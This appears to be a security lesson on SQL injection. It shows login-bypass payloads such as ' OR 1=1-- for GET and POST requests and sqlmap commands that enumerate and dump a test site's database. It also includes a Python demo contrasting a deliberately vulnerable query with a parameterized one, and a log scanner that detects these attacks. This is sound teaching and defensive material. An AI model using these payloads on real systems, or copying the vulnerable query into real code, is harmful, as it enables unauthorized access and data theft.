Exploitation

One of the aims of every cybercriminal is to get access to databases to steal users’ credentials, alter the data, or even sabotage an organization’s ability to function by deleting everything. This is where finding SQL injections becomes important. The data gained from an injection, or the injection vector itself, can be used to perform other attacks or, where possible, go straight for privilege escalation.

Let’s look at some ways in which SQL injections can be exploited.

The GET method

We first check whether the data sent in the request appears in the URL. If it does, the submitted data is visible in the URL. For example, let’s take a web application that has a login page. We enter the username and password, and when we click the “Login” button, the URL updates as follows:

example.com/login.php?username=admin&password=admin

In order to bypass the login and gain unauthorized access, an attacker could perform a simple SQL injection like so:

example.com/login.php?username='OR1=1--&password=admin

Entering the URL above makes the leading quote close the username string (so the username being compared is empty), the OR1=1 part makes the WHERE condition true for every row no matter what, and the trailing -- comments out the rest of the query, so the password field is never checked at all.

The POST method

This is the case where the data is sent in the body of the request sent by the user. Therefore, as opposed to the GET method, the sent data is not visible in the URL of the website or the webpage. An attacker can instead use the input fields provided by the web application. Simply entering ' OR 1=1 in a field is usually enough. Sometimes we need something extra to comment out the rest of the query, in which case appending a # or -- should suffice.
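As an added example that is not code from the original lesson, the Python script below builds the kind of login query that would sit behind a hypothetical login.php in two ways: by pasting the submitted fields into the SQL string, and with a parameterized query. Whether the fields arrive by GET or POST makes no difference to the database, so one script illustrates both sections above. The users table, the account, the SHA-256 stand-in for password hashing and the use of SQLite are all constructed for this example.

```python
import hashlib
import sqlite3


def _hash(password):
    # Plain SHA-256 stands in for a real password hash; the point here is the query, not storage.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    # Constructed in-memory user store (hypothetical schema).
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        ("admin", _hash("correct horse")),
    )
    conn.commit()
    return conn


def build_vulnerable_sql(username, password):
    # The submitted fields are pasted straight into the statement, so a quote in
    # the username ends the string literal and whatever follows is parsed as SQL.
    return (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password_hash = '{_hash(password)}'"
    )


def login_vulnerable(conn, username, password):
    row = conn.execute(build_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Parameterized query: the driver passes the values separately from the SQL
    # text, so the database never interprets them as syntax.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, _hash(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"  # the username value from the lesson
    print(build_vulnerable_sql(payload, "anything"))
    print("vulnerable:", login_vulnerable(db, payload, "anything"))  # admin
    print("safe:      ", login_safe(db, payload, "anything"))  # None
```

Running it shows that the payload logs in as the first user through login_vulnerable but is rejected by login_safe, because the driver sends it as a literal value rather than as SQL text. Hashing the password before it reaches the query does not help, since the injection sits in the username field; only parameterization (a prepared statement in PHP's PDO or mysqli does the same job) removes the flaw.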

SQLMap

We’ve already seen SQLMap in action in the previous lesson. Let’s now see how to use it beyond searching for vulnerabilities:

  • sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables: This will return all the tables in the acuart database.

  • sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --columns: This will return the structure of the table being queried. In this case, we want to check how data is structured in the artists table.

  • sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dump: This will return a list of the names of all the artists in the artists table.
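Each of these enumeration steps leaves traces in the web server's access log. As an added example that is not part of the original lesson, the Python script below scans constructed log lines (combined log format; the addresses, timestamps and the exact version in the User-Agent are made up) for two indicators: a User-Agent beginning with "sqlmap/", which is the prefix sqlmap's default User-Agent uses, and the ' OR 1=1 / comment-sequence pattern from earlier in this lesson, matched after URL-decoding the query string.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache/nginx "combined" log format (addresses,
# timestamps, paths and the sqlmap version string are made up for this example).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:55:40 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 500 312 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.9 - - [10/Oct/2023:13:55:41 +0000] "GET /login.php?username=%27OR1%3D1--&password=admin HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "POST /login.php HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The tautology-plus-comment shape from this lesson, matched after URL decoding.
INJECTION_RE = re.compile(r"'\s*or\s*1\s*=\s*1|'\s*(--|#)", re.IGNORECASE)


def analyse_line(line):
    """Return a finding dict for a suspicious line, or None for a benign one."""
    m = LOG_RE.fullmatch(line)
    if not m:
        return None
    reasons = []
    if m["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap user-agent")
    decoded_path = unquote_plus(m["path"])  # %27 -> ', %3D -> =, + -> space
    if INJECTION_RE.search(decoded_path):
        reasons.append("injection pattern in query string")
    if not reasons:
        return None
    return {"ip": m["ip"], "method": m["method"], "path": decoded_path, "reasons": reasons}


def find_suspicious(log_text):
    return [f for f in map(analyse_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

Note the limitation this exposes: the POST request in the sample passes the filter because only the request line is logged and the body is not, which mirrors the GET/POST distinction above; catching injection in POST fields needs application-level logging or a WAF that inspects request bodies. The User-Agent is attacker-controlled, so that signal is a quick win rather than a control to rely on.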
